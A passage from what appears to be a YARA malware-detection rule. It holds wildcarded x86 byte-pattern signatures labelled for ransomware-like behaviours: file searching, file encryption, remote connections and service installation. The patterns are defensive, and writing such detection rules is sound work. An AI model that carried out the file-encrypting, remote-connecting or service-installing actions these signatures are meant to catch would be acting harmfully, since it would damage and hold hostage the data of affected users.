?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 - 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF - D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 - 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? - 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0 - 74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ?? - ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? - 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ?? - ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89 - 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 - 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? - FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 - ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89 - C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 - 4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 - C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04 - 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? - 89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 - ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45 - ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? - C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? - ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? - 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45 - ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? - ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 - 45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 - F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? - ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? - ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B - 45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B - 55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ?? - ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 - A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B - 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? - 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? - ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B - 45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B - 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? - 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B - 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 - ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? - FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2 - } - $search_files = { - E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? - 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ?? - ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC - ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 - ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89 - C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - 89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 - ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1 - E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85 - ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 - C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? - ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? - ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? - ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 - 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 - ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ?? - ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 - 74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1 - E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 - ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 - } - $search_files_2 = { - FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ?? - 83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B - 00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? - ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? - ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? - 89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 - 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 - } - $remote_connection = { - 55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7 - 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 - ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45 - ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? - 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? - ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ?? - 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8 - ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC - ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ?? - ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ?? - ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ?? - 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 - ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89 - C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 - C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ?? - ?? ?? 90 8B 5D ?? C9 C2 - } - $remote_connection_2 = { - 55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ?? - ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 - 44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ?? - 74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ?? - ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B - 45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04 - 43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ?? - ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ?? - 74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? - 8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04 - 24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 - } - $encrypt_files_3 = { - 55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? - ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ?? - 8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF - 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? - ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? - ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? - 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 - C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? - 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B - 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 - 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 - E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? - ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 - 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 - ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? - 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 - 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 - 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? - ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 - C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 - 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B - 7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ?? - ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ?? - 85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB - } - $encrypt_files_4 = { - FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B - 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ?? - ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ?? - 39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC - ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? - ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7 - 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 89 04 24 FF 15 - } - $search_files_3 = { - FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85 - ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83 - EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ?? - ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ?? - 8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B - 1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C - 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 - ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F - B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 - ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 - E8 - } - $install_service = { - FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 - 89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC - ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ?? - ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 